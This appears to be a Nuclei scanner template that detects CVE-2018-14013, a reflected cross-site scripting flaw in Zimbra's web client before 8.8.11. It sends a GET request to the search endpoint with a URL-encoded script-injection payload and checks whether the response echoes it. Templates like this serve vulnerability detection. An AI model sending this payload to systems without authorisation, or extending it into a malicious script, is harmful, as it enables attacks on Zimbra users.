nuclei-templates/cves/2018/CVE-2018-14013.yaml

42 lines
1.2 KiB
YAML

id: CVE-2018-14013
info:
name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
reference:
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109018
- https://bugzilla.zimbra.com/show_bug.cgi?id=109017
- https://nvd.nist.gov/vuln/detail/CVE-2018-14013
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14013
cwe-id: CWE-79
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html
# Enhanced by mp on 2022/08/18